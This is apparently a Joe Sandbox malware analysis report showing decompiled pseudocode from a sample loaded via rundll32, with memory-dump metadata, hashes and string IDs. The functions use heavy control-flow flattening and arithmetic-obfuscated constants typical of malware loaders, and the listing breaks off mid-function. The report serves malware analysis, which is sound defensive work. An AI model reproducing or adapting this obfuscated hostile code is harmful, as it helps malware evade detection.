                                                                                                                          				_v56 = 0x2d6903;
                                                                                                                          				_v56 = _v56 >> 0xc;
                                                                                                                          				_v56 = _v56 + 0xffff4c70;
                                                                                                                          				_v56 = _v56 ^ 0xfff58c10;
                                                                                                                          				_v132 = 0xe5be5a;
                                                                                                                          				_v132 = _v132 + 0xfffffbec;
                                                                                                                          				_v132 = _v132 << 3;
                                                                                                                          				_v132 = _v132 ^ 0x46ad3c03;
                                                                                                                          				_v132 = _v132 ^ 0x418237eb;
                                                                                                                          				_v108 = 0x3fa801;
                                                                                                                          				_v108 = _v108 + 0x902;
                                                                                                                          				_v108 = _v108 >> 7;
                                                                                                                          				_v108 = _v108 ^ 0x9ac0b97a;
                                                                                                                          				_v108 = _v108 ^ 0x9ac73a04;
                                                                                                                          				_v72 = 0x454e35;
                                                                                                                          				_v72 = _v72 + 0x4c9c;
                                                                                                                          				_t307 = 0x29;
                                                                                                                          				_v72 = _v72 / _t307;
                                                                                                                          				_v72 = _v72 ^ 0x000328df;
                                                                                                                          				_v32 = 0x46b9f;
                                                                                                                          				_v32 = _v32 >> 4;
                                                                                                                          				_v32 = _v32 ^ 0x0003d4b9;
                                                                                                                          				_v16 = 0xab007f;
                                                                                                                          				_v16 = _v16 ^ 0x56a4e801;
                                                                                                                          				_v16 = _v16 ^ 0x56002f48;
                                                                                                                          				_v100 = 0xb9d48c;
                                                                                                                          				_v100 = _v100 | 0xb434f54e;
                                                                                                                          				_v100 = _v100 >> 0x10;
                                                                                                                          				_v100 = _v100 ^ 0x000dcd0e;
                                                                                                                          				_v92 = 0x17070b;
                                                                                                                          				_t308 = 0x37;
                                                                                                                          				_v92 = _v92 / _t308;
                                                                                                                          				_v92 = _v92 << 7;
                                                                                                                          				_v92 = _v92 ^ 0x0038b56c;
                                                                                                                          				_v60 = 0xdb418a;
                                                                                                                          				_v60 = _v60 * 0x4d;
                                                                                                                          				_v60 = _v60 << 2;
                                                                                                                          				_v60 = _v60 ^ 0x07c52fa3;
                                                                                                                          				_v68 = 0x99d1b0;
                                                                                                                          				_v68 = _v68 << 1;
                                                                                                                          				_v68 = _v68 + 0xadc1;
                                                                                                                          				_v68 = _v68 ^ 0x01384a96;
                                                                                                                          				_v120 = 0xfb4a64;
                                                                                                                          				_v120 = _v120 | 0x92bfeeef;
                                                                                                                          				_v120 = _v120 + 0x1827;
                                                                                                                          				_v120 = _v120 >> 5;
                                                                                                                          				_v120 = _v120 ^ 0x0494323d;
                                                                                                                          				_v128 = 0xf75f57;
                                                                                                                          				_v128 = _v128 >> 4;
                                                                                                                          				_v128 = _v128 + 0xe158;
                                                                                                                          				_v128 = _v128 + 0xffff16ce;
                                                                                                                          				_v128 = _v128 ^ 0x000f9950;
                                                                                                                          				_v76 = 0xb94cf;
                                                                                                                          				_v76 = _v76 | 0xc911a6ab;
                                                                                                                          				_v76 = _v76 >> 2;
                                                                                                                          				_v76 = _v76 ^ 0x3240c46f;
                                                                                                                          				_v104 = 0x7ca07;
                                                                                                                          				_v104 = _v104 * 0x23;
                                                                                                                          				_v104 = _v104 >> 4;
                                                                                                                          				_v104 = _v104 ^ 0xe4d42587;
                                                                                                                          				_v104 = _v104 ^ 0xe4c14657;
                                                                                                                          				_v44 = 0x308a5a;
                                                                                                                          				_v44 = _v44 >> 0x10;
                                                                                                                          				_v44 = _v44 ^ 0x0006e55e;
                                                                                                                          				_v96 = 0x427aa5;
                                                                                                                          				_v96 = _v96 + 0xed3d;
                                                                                                                          				_v96 = _v96 + 0xffff13f4;
                                                                                                                          				_v96 = _v96 ^ 0x0046a078;
                                                                                                                          				_v20 = 0xf8f4;
                                                                                                                          				_v20 = _v20 * 0x4a;
                                                                                                                          				_t284 = 0x4469cd4;
                                                                                                                          				_v20 = _v20 ^ 0x004ab19f;
                                                                                                                          				_v36 = 0x7998ac;
                                                                                                                          				_v36 = _v36 >> 0xc;
                                                                                                                          				_v36 = _v36 ^ 0x0008cf6c;
                                                                                                                          				do {
                                                                                                                          					while(_t301 != _t284) {
                                                                                                                          						if(_t301 == 0x661bd7c) {
                                                                                                                          							E0079957D(_v8, _v96, _v20, _v28, _v36);
                                                                                                                          						} else {
                                                                                                                          							if(_t301 == 0x8cd68b1) {
                                                                                                                          								_push(_v116);
                                                                                                                          								_push(_v124);
                                                                                                                          								_t293 = E007ADCF7(_v84, 0x791954, __eflags);
                                                                                                                          								_push(_v52);
                                                                                                                          								_push(_v48);
                                                                                                                          								__eflags = E00799462(_t293, _v80,  &_v8, E007ADCF7(_v88, 0x791814, __eflags), _v56, _v40) - _v12;
                                                                                                                          								_t301 =  ==  ? 0x4469cd4 : 0x94c729c;
                                                                                                                          								E0079A8B0(_v132, _t293, _v108);
                                                                                                                          								E0079A8B0(_v72, _t294, _v32);
                                                                                                                          								_t343 = _v4;
                                                                                                                          								L8:
                                                                                                                          								_t284 = 0x4469cd4;
                                                                                                                          								_t348 =  &(_t348[0xb]);
                                                                                                                          								goto L9;
                                                                                                                          							} else {
                                                                                                                          								if(_t301 != 0x97dfe60) {
                                                                                                                          									goto L9;
                                                                                                                          								} else {
                                                                                                                          									_t301 = 0x8cd68b1;
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L12:
                                                                                                                          						return _t347;
                                                                                                                          					}
                                                                                                                          					_push(_v92);
                                                                                                                          					_push(_v100);
                                                                                                                          					_t285 = E007ADCF7(_v16, 0x791854, __eflags);
                                                                                                                          					_pop(_t311);
                                                                                                                          					_t286 =  *0x7b3dfc; // 0x0
                                                                                                                          					__eflags = E0079AA4D(_v60, _t285,  *((intOrPtr*)(_t343 + 4)), _v120, _v24, _v8, _t286 + 0x40, _v128, _t311,  *_t343, _v76) - _v112;
                                                                                                                          					_t301 = 0x661bd7c;
                                                                                                                          					_t347 =  ==  ? 1 : _t347;
                                                                                                                          					E0079A8B0(_v104, _t285, _v44);
                                                                                                                          					goto L8;
                                                                                                                          					L9:
                                                                                                                          					__eflags = _t301 - 0x94c729c;
                                                                                                                          				} while (__eflags != 0);
                                                                                                                          				goto L12;
                                                                                                                          			}

                                                                                                                          0x007a95f9
                                                                                                                          0x007a953c
                                                                                                                          0x007a9545
                                                                                                                          0x007a9550
                                                                                                                          0x007a9556
                                                                                                                          0x007a9564
                                                                                                                          0x007a95a0
                                                                                                                          0x007a95a2
                                                                                                                          0x007a95ab
                                                                                                                          0x007a95b0
                                                                                                                          0x00000000
                                                                                                                          0x007a95bd
                                                                                                                          0x007a95bd
                                                                                                                          0x007a95bd
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 5NE$=$H/$X$]R$dklp
                                                                                                                          • API String ID: 0-668800459
                                                                                                                          • Opcode ID: 23f4abd7d33b23c8a265d0671c31733d79bafa2498ee1a55f8f3bc874658bcf2
                                                                                                                          • Instruction ID: 646ee89b88d54726ce63a722e6ca313b6cb4cfce0482d69292e3d93fc50a4893
                                                                                                                          • Opcode Fuzzy Hash: 23f4abd7d33b23c8a265d0671c31733d79bafa2498ee1a55f8f3bc874658bcf2
                                                                                                                          • Instruction Fuzzy Hash: 90D12FB11097808FD769CF25C48A50BBBF1FBC5758F508A1DF2AA86260DBB58949CF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E007B0F33() {
                                                                                                                          				signed int _t237;
                                                                                                                          				signed char _t246;
                                                                                                                          				signed short _t255;
                                                                                                                          				signed int _t262;
                                                                                                                          				signed char _t269;
                                                                                                                          				intOrPtr* _t292;
                                                                                                                          				signed short _t301;
                                                                                                                          				void* _t302;
                                                                                                                          				signed short _t306;
                                                                                                                          				signed int _t309;
                                                                                                                          				signed int _t310;
                                                                                                                          				signed int _t311;
                                                                                                                          				signed int _t312;
                                                                                                                          				signed int _t313;
                                                                                                                          				signed int _t314;
                                                                                                                          				signed int _t315;
                                                                                                                          				signed short _t319;
                                                                                                                          				void* _t321;
                                                                                                                          
                                                                                                                          				 *(_t321 + 0x20) = 0xee0abc;
                                                                                                                          				 *(_t321 + 0x20) =  *(_t321 + 0x20) | 0x247001dc;
                                                                                                                          				_t262 = 0x40ff1a8;
                                                                                                                          				 *(_t321 + 0x30) =  *(_t321 + 0x20) * 0xb;
                                                                                                                          				 *(_t321 + 0x30) =  *(_t321 + 0x30) ^ 0x96ee7e42;
                                                                                                                          				 *(_t321 + 0x14) = 0x97563a;
                                                                                                                          				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0xa3ba;
                                                                                                                          				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0x7434;
                                                                                                                          				_t309 = 0x68;
                                                                                                                          				 *(_t321 + 0x18) =  *(_t321 + 0x14) / _t309;
                                                                                                                          				 *(_t321 + 0x18) =  *(_t321 + 0x18) ^ 0x000fa3ad;
                                                                                                                          				 *(_t321 + 0x54) = 0x46dfd;
                                                                                                                          				_t310 = 0x22;
                                                                                                                          				 *(_t321 + 0x54) =  *(_t321 + 0x54) * 0x3f;
                                                                                                                          				 *(_t321 + 0x54) =  *(_t321 + 0x54) ^ 0x011c0bd3;
                                                                                                                          				 *(_t321 + 0x50) = 0x65d669;
                                                                                                                          				 *(_t321 + 0x50) =  *(_t321 + 0x50) >> 4;
                                                                                                                          				 *(_t321 + 0x50) =  *(_t321 + 0x50) ^ 0x0002663c;
                                                                                                                          				 *(_t321 + 0x1c) = 0xa5dab8;
                                                                                                                          				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) * 0x23;
                                                                                                                          				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 2;
                                                                                                                          				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) << 0xd;
                                                                                                                          				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x67379b84;
                                                                                                                          				 *(_t321 + 0x58) = 0x508bac;
                                                                                                                          				 *(_t321 + 0x58) =  *(_t321 + 0x58) + 0x81b9;
                                                                                                                          				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x005059a5;
                                                                                                                          				 *(_t321 + 0x38) = 0x6dc462;
                                                                                                                          				 *(_t321 + 0x38) =  *(_t321 + 0x38) / _t310;
                                                                                                                          				 *(_t321 + 0x38) =  *(_t321 + 0x38) | 0x03137037;
                                                                                                                          				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x03112268;
                                                                                                                          				 *(_t321 + 0x20) = 0x10f337;
                                                                                                                          				 *(_t321 + 0x20) =  *(_t321 + 0x20) << 0x10;
                                                                                                                          				_t311 = 0x7a;
                                                                                                                          				 *(_t321 + 0x1c) =  *(_t321 + 0x20) * 0x5e;
                                                                                                                          				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 3;
                                                                                                                          				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x09c781ed;
                                                                                                                          				 *(_t321 + 0x28) = 0x5a8e56;
                                                                                                                          				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x165ac6ba;
                                                                                                                          				 *(_t321 + 0x28) =  *(_t321 + 0x28) / _t311;
                                                                                                                          				 *(_t321 + 0x28) =  *(_t321 + 0x28) >> 6;
                                                                                                                          				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x000470dc;
                                                                                                                          				 *(_t321 + 0x40) = 0x558325;
                                                                                                                          				 *(_t321 + 0x40) =  *(_t321 + 0x40) | 0xb8e268f7;
                                                                                                                          				 *(_t321 + 0x40) =  *(_t321 + 0x40) + 0x4ee7;
                                                                                                                          				 *(_t321 + 0x40) =  *(_t321 + 0x40) ^ 0xb8f7e628;
                                                                                                                          				 *(_t321 + 0x3c) = 0x76576d;
                                                                                                                          				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) << 1;
                                                                                                                          				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) + 0xffff05d8;
                                                                                                                          				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) ^ 0x00efc885;
                                                                                                                          				 *(_t321 + 0x38) = 0x7fcfc;
                                                                                                                          				 *(_t321 + 0x38) =  *(_t321 + 0x38) >> 4;
                                                                                                                          				 *(_t321 + 0x38) =  *(_t321 + 0x38) * 0x1e;
                                                                                                                          				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x0005448a;
                                                                                                                          				 *(_t321 + 0x58) = 0x685aea;
                                                                                                                          				 *(_t321 + 0x58) =  *(_t321 + 0x58) | 0x7e49cfb4;
                                                                                                                          				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x7e6c4597;
                                                                                                                          				 *(_t321 + 0x24) = 0x2cb25b;
                                                                                                                          				 *(_t321 + 0x24) =  *(_t321 + 0x24) | 0x98b89101;
                                                                                                                          				 *(_t321 + 0x24) =  *(_t321 + 0x24) + 0x99b1;
                                                                                                                          				 *(_t321 + 0x24) =  *(_t321 + 0x24) << 5;
                                                                                                                          				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x17a3ab17;
                                                                                                                          				 *(_t321 + 0x20) = 0x5c4f5f;
                                                                                                                          				_t312 = 0x75;
                                                                                                                          				_t306 =  *(_t321 + 0x70);
                                                                                                                          				 *(_t321 + 0x24) =  *(_t321 + 0x20) * 0x3b;
                                                                                                                          				_t319 =  *(_t321 + 0x70);
                                                                                                                          				 *(_t321 + 0x24) =  *(_t321 + 0x24) / _t312;
                                                                                                                          				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b5669b3;
                                                                                                                          				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b72ed3d;
                                                                                                                          				 *(_t321 + 0x48) = 0x281dd4;
                                                                                                                          				 *(_t321 + 0x48) =  *(_t321 + 0x48) >> 8;
                                                                                                                          				 *(_t321 + 0x48) =  *(_t321 + 0x48) + 0xfffffe89;
                                                                                                                          				 *(_t321 + 0x48) =  *(_t321 + 0x48) ^ 0x000ef8bb;
                                                                                                                          				 *(_t321 + 0x60) = 0x5ec984;
                                                                                                                          				 *(_t321 + 0x60) =  *(_t321 + 0x60) + 0xefe6;
                                                                                                                          				 *(_t321 + 0x60) =  *(_t321 + 0x60) ^ 0x00516114;
                                                                                                                          				 *(_t321 + 0x4c) = 0xbf15d9;
                                                                                                                          				_t313 = 0x6c;
                                                                                                                          				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t313;
                                                                                                                          				_t314 = 0x6b;
                                                                                                                          				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t314;
                                                                                                                          				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) ^ 0x000706ff;
                                                                                                                          				 *(_t321 + 0x30) = 0x4468c3;
                                                                                                                          				_t315 = 0x7e;
                                                                                                                          				 *(_t321 + 0x2c) =  *(_t321 + 0x30) * 0x39;
                                                                                                                          				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) / _t315;
                                                                                                                          				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) * 0x49;
                                                                                                                          				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) ^ 0x08d90aee;
                                                                                                                          				while(1) {
                                                                                                                          					L1:
                                                                                                                          					_t292 =  *0x7b3e08; // 0x0
                                                                                                                          					while(1) {
                                                                                                                          						L2:
                                                                                                                          						_t237 =  *(_t321 + 0x60);
                                                                                                                          						L3:
                                                                                                                          						while(_t262 != 0x160fcc4) {
                                                                                                                          							if(_t262 == 0x26954f0) {
                                                                                                                          								 *_t237 = _t319;
                                                                                                                          								_t262 = 0xfeff895;
                                                                                                                          								 *_t292 =  *_t292 + 1;
                                                                                                                          								_t237 = _t319;
                                                                                                                          								 *(_t321 + 0x60) = _t237;
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								if(_t262 == 0x40ff1a8) {
                                                                                                                          									_t179 = _t292 + 0x20; // 0x20
                                                                                                                          									_t237 = _t179;
                                                                                                                          									_t262 = 0x5ead19b;
                                                                                                                          									 *(_t321 + 0x60) = _t237;
                                                                                                                          									continue;
                                                                                                                          								} else {
                                                                                                                          									if(_t262 == 0x58e8483) {
                                                                                                                          										_push(_t262);
                                                                                                                          										_push(_t262);
                                                                                                                          										_t302 = 0x40;
                                                                                                                          										_t319 = E00797FF2(_t302);
                                                                                                                          										__eflags = _t319;
                                                                                                                          										if(__eflags == 0) {
                                                                                                                          											goto L20;
                                                                                                                          										} else {
                                                                                                                          											_t262 = 0x160fcc4;
                                                                                                                          											goto L1;
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          										if(_t262 == 0x5ead19b) {
                                                                                                                          											_t255 = E007A7BA6(_t321 + 0x6c,  *(_t321 + 0x38), __eflags,  *(_t321 + 0x18), 0x7b3000);
                                                                                                                          											 *(_t321 + 0x70) = _t255;
                                                                                                                          											_t306 = _t255;
                                                                                                                          											 *((intOrPtr*)(_t321 + 0x68)) = _t255 +  *((intOrPtr*)(_t321 + 0x68));
                                                                                                                          											_t262 = 0x58e8483;
                                                                                                                          											while(1) {
                                                                                                                          												L1:
                                                                                                                          												_t292 =  *0x7b3e08; // 0x0
                                                                                                                          												goto L2;
                                                                                                                          											}
                                                                                                                          										} else {
                                                                                                                          											if(_t262 == 0xd41016e) {
                                                                                                                          												E007A8519( *(_t321 + 0x4c),  *(_t321 + 0x2c),  *((intOrPtr*)(_t321 + 0x6c)));
                                                                                                                          												L20:
                                                                                                                          												_t292 =  *0x7b3e08; // 0x0
                                                                                                                          											} else {
                                                                                                                          												if(_t262 != 0xfeff895) {
                                                                                                                          													L17:
                                                                                                                          													__eflags = _t262 - 0x20f61b3;
                                                                                                                          													if(__eflags != 0) {
                                                                                                                          														L2:
                                                                                                                          														_t237 =  *(_t321 + 0x60);
                                                                                                                          														continue;
                                                                                                                          													}
                                                                                                                          												} else {
                                                                                                                          													asm("sbb ecx, ecx");
                                                                                                                          													_t262 = (_t262 & 0xf84d8315) + 0xd41016e;
                                                                                                                          													continue;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							 *(_t292 + 0x14) =  *(_t292 + 0x14) & 0x00000000;
                                                                                                                          							 *((intOrPtr*)(_t292 + 4)) =  *(_t292 + 0x20);
                                                                                                                          							__eflags = 1;
                                                                                                                          							return 1;
                                                                                                                          						}
                                                                                                                          						_push( *(_t321 + 0x1c));
                                                                                                                          						_push( *(_t321 + 0x38));
                                                                                                                          						 *((char*)(_t321 + 0x1b)) =  *((intOrPtr*)(_t306 + 1));
                                                                                                                          						 *((char*)(_t321 + 0x1a)) =  *((intOrPtr*)(_t306 + 2));
                                                                                                                          						E007A1652( *(_t321 + 0x70), __eflags,  *(_t321 + 0x47) & 0x000000ff,  *(_t321 + 0x26) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x68)),  *(_t321 + 0x60), E007ADCF7( *((intOrPtr*)(_t321 + 0x5c)), 0x791590, __eflags), 0x10, _t319 + 0x1c,  *(_t321 + 0x70),  *(_t306 + 3) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x34)),  *(_t306 + 3) & 0x000000ff,  *(_t321 + 0x28));
                                                                                                                          						E0079A8B0( *((intOrPtr*)(_t321 + 0x80)), _t240,  *((intOrPtr*)(_t321 + 0x94)));
                                                                                                                          						_t321 = _t321 + 0x3c;
                                                                                                                          						 *(_t319 + 0x1a) = ( *(_t306 + 4) & 0x000000ff) << 0x00000008 |  *(_t306 + 5) & 0x000000ff;
                                                                                                                          						_t246 =  *((intOrPtr*)(_t306 + 6));
                                                                                                                          						_t269 =  *((intOrPtr*)(_t306 + 7));
                                                                                                                          						_t306 = _t306 + 8;
                                                                                                                          						_t262 = 0x26954f0;
                                                                                                                          						_t301 = (_t246 & 0x000000ff) << 0x00000008 | _t269 & 0x000000ff;
                                                                                                                          						__eflags = _t301;
                                                                                                                          						 *(_t319 + 0x18) = _t301;
                                                                                                                          						_t292 =  *0x7b3e08; // 0x0
                                                                                                                          						goto L17;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}






















                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4t$=r;$_O\$mWv$N$Zh
                                                                                                                          • API String ID: 0-2036408213
                                                                                                                          • Opcode ID: bbf8637486fe2517bea5130f27849a817960a81cb3a447b71b7c3e4cf9797567
                                                                                                                          • Instruction ID: e1c68565833a882228618c14cbb86dddf95ca4ec550764d68df0180110081538
                                                                                                                          • Opcode Fuzzy Hash: bbf8637486fe2517bea5130f27849a817960a81cb3a447b71b7c3e4cf9797567
                                                                                                                          • Instruction Fuzzy Hash: 1EC151715083819FC318CF29C49955BBFE1FBC9358F908A0EF69696260D3B8D949CF86
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E007AD389(void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                          				intOrPtr _v60;
                                                                                                                          				char _v68;
                                                                                                                          				char _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				signed int _v88;
                                                                                                                          				signed int _v92;
                                                                                                                          				signed int _v96;
                                                                                                                          				signed int _v100;
                                                                                                                          				signed int _v104;
                                                                                                                          				signed int _v108;
                                                                                                                          				signed int _v112;
                                                                                                                          				signed int _v116;
                                                                                                                          				signed int _v120;
                                                                                                                          				signed int _v124;
                                                                                                                          				signed int _v128;
                                                                                                                          				signed int _v132;
                                                                                                                          				signed int _v136;
                                                                                                                          				signed int _v140;
                                                                                                                          				signed int _v144;
                                                                                                                          				signed int _v148;
                                                                                                                          				signed int _v152;
                                                                                                                          				signed int _v156;
                                                                                                                          				signed int _v160;
                                                                                                                          				signed int _v164;
                                                                                                                          				signed int _v168;
                                                                                                                          				void* __ecx;
                                                                                                                          				char _t245;
                                                                                                                          				void* _t263;
                                                                                                                          				signed int _t272;
                                                                                                                          				signed int _t273;
                                                                                                                          				signed int _t274;
                                                                                                                          				signed int _t275;
                                                                                                                          				signed int _t276;
                                                                                                                          				signed int _t277;
                                                                                                                          				void* _t280;
                                                                                                                          				void* _t306;
                                                                                                                          				intOrPtr _t307;
                                                                                                                          				char _t308;
                                                                                                                          				signed int* _t311;
                                                                                                                          
                                                                                                                          				_push(_a28);
                                                                                                                          				_t306 = __edx;
                                                                                                                          				_push(_a24);
                                                                                                                          				_push(0);
                                                                                                                          				_push(_a16);
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(0);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				_t245 = E007A20B9(0);
                                                                                                                          				_v72 = _t245;
                                                                                                                          				_t311 =  &(( &_v168)[9]);
                                                                                                                          				_v84 = 0xd8cd3;
                                                                                                                          				_t307 = _t245;
                                                                                                                          				_v84 = _v84 ^ 0x2f0b54cb;
                                                                                                                          				_v84 = _v84 ^ 0x2f06dc18;
                                                                                                                          				_t280 = 0xd3d1227;
                                                                                                                          				_v116 = 0xdf2f98;
                                                                                                                          				_v116 = _v116 >> 4;
                                                                                                                          				_v116 = _v116 | 0xd629951a;
                                                                                                                          				_v116 = _v116 ^ 0xd62df7db;
                                                                                                                          				_v120 = 0x9d2532;
                                                                                                                          				_v120 = _v120 | 0x60368432;
                                                                                                                          				_v120 = _v120 << 1;
                                                                                                                          				_v120 = _v120 ^ 0xc1706bd2;
                                                                                                                          				_v104 = 0x3ed100;
                                                                                                                          				_v104 = _v104 >> 0xd;
                                                                                                                          				_v104 = _v104 << 0x10;
                                                                                                                          				_v104 = _v104 ^ 0x01fb42fe;
                                                                                                                          				_v132 = 0xac3ff1;
                                                                                                                          				_v132 = _v132 << 1;
                                                                                                                          				_v132 = _v132 ^ 0x8b709814;
                                                                                                                          				_v132 = _v132 + 0xffff5c55;
                                                                                                                          				_v132 = _v132 ^ 0x8a223f6b;
                                                                                                                          				_v164 = 0xc1955c;
                                                                                                                          				_v164 = _v164 + 0xe851;
                                                                                                                          				_v164 = _v164 >> 5;
                                                                                                                          				_t272 = 0x7c;
                                                                                                                          				_v164 = _v164 / _t272;
                                                                                                                          				_v164 = _v164 ^ 0x000d6983;
                                                                                                                          				_v76 = 0x371de3;
                                                                                                                          				_v76 = _v76 >> 1;
                                                                                                                          				_v76 = _v76 ^ 0x00157680;
                                                                                                                          				_v156 = 0xc7985;
                                                                                                                          				_v156 = _v156 + 0xffff997a;
                                                                                                                          				_v156 = _v156 + 0x5493;
                                                                                                                          				_v156 = _v156 ^ 0xa8ab967c;
                                                                                                                          				_v156 = _v156 ^ 0xa8a621f4;
                                                                                                                          				_v92 = 0xd6ada;
                                                                                                                          				_v92 = _v92 + 0xf102;
                                                                                                                          				_v92 = _v92 ^ 0x00049005;
                                                                                                                          				_v152 = 0xbb1df2;
                                                                                                                          				_t273 = 0x71;
                                                                                                                          				_v152 = _v152 * 0x37;
                                                                                                                          				_v152 = _v152 << 2;
                                                                                                                          				_v152 = _v152 + 0x7572;
                                                                                                                          				_v152 = _v152 ^ 0xa0c338c0;
                                                                                                                          				_v108 = 0xfb68a6;
                                                                                                                          				_v108 = _v108 / _t273;
                                                                                                                          				_v108 = _v108 * 0x38;
                                                                                                                          				_v108 = _v108 ^ 0x00745d8a;
                                                                                                                          				_v160 = 0x9cfb41;
                                                                                                                          				_v160 = _v160 >> 0xd;
                                                                                                                          				_v160 = _v160 + 0xffff2425;
                                                                                                                          				_v160 = _v160 | 0xc56bf860;
                                                                                                                          				_v160 = _v160 ^ 0xffffb927;
                                                                                                                          				_v100 = 0xcc3697;
                                                                                                                          				_v100 = _v100 << 9;
                                                                                                                          				_t274 = 0x3d;
                                                                                                                          				_v100 = _v100 / _t274;
                                                                                                                          				_v100 = _v100 ^ 0x027f162e;
                                                                                                                          				_v124 = 0x5e8102;
                                                                                                                          				_v124 = _v124 << 1;
                                                                                                                          				_v124 = _v124 >> 4;
                                                                                                                          				_v124 = _v124 ^ 0x000928e5;
                                                                                                                          				_v96 = 0x9a5083;
                                                                                                                          				_v96 = _v96 + 0xffff88fb;
                                                                                                                          				_v96 = _v96 | 0x7e2ee754;
                                                                                                                          				_v96 = _v96 ^ 0x7eb15945;
                                                                                                                          				_v168 = 0x417f4c;
                                                                                                                          				_v168 = _v168 + 0x30ef;
                                                                                                                          				_v168 = _v168 + 0xffff0fcf;
                                                                                                                          				_v168 = _v168 | 0x766f950c;
                                                                                                                          				_v168 = _v168 ^ 0x7667a907;
                                                                                                                          				_v148 = 0xeb5ea2;
                                                                                                                          				_v148 = _v148 >> 1;
                                                                                                                          				_v148 = _v148 | 0xdbfe62fd;
                                                                                                                          				_v148 = _v148 ^ 0xdbf81284;
                                                                                                                          				_v88 = 0xc982d2;
                                                                                                                          				_v88 = _v88 | 0xbf502ba4;
                                                                                                                          				_v88 = _v88 ^ 0xbfda3d08;
                                                                                                                          				_v80 = 0x51a7e7;
                                                                                                                          				_v80 = _v80 | 0xcf4b4eb1;
                                                                                                                          				_v80 = _v80 ^ 0xcf5d8599;
                                                                                                                          				_v140 = 0x112038;
                                                                                                                          				_v140 = _v140 >> 0xc;
                                                                                                                          				_v140 = _v140 | 0x79e3f6d0;
                                                                                                                          				_v140 = _v140 >> 0xc;
                                                                                                                          				_v140 = _v140 ^ 0x000d6368;
                                                                                                                          				_v144 = 0x3c4be1;
                                                                                                                          				_v144 = _v144 << 1;
                                                                                                                          				_t275 = 0x51;
                                                                                                                          				_v144 = _v144 / _t275;
                                                                                                                          				_t276 = 0x44;
                                                                                                                          				_v144 = _v144 / _t276;
                                                                                                                          				_v144 = _v144 ^ 0x0006a926;
                                                                                                                          				_v112 = 0xebe610;
                                                                                                                          				_t277 = 6;
                                                                                                                          				_v112 = _v112 / _t277;
                                                                                                                          				_v112 = _v112 ^ 0x8e2a0175;
                                                                                                                          				_v112 = _v112 ^ 0x8e0783c0;
                                                                                                                          				_v128 = 0x507b99;
                                                                                                                          				_v128 = _v128 ^ 0xb6dd86a4;
                                                                                                                          				_v128 = _v128 + 0xffff6e9b;
                                                                                                                          				_v128 = _v128 * 0x6f;
                                                                                                                          				_v128 = _v128 ^ 0x275b8ca8;
                                                                                                                          				_v136 = 0x1b49e9;
                                                                                                                          				_v136 = _v136 * 0x22;
                                                                                                                          				_v136 = _v136 ^ 0x6bc19a50;
                                                                                                                          				_v136 = _v136 ^ 0xda04c504;
                                                                                                                          				_v136 = _v136 ^ 0xb25c1cc6;
                                                                                                                          				do {
                                                                                                                          					while(_t280 != 0x9b6c7ef) {
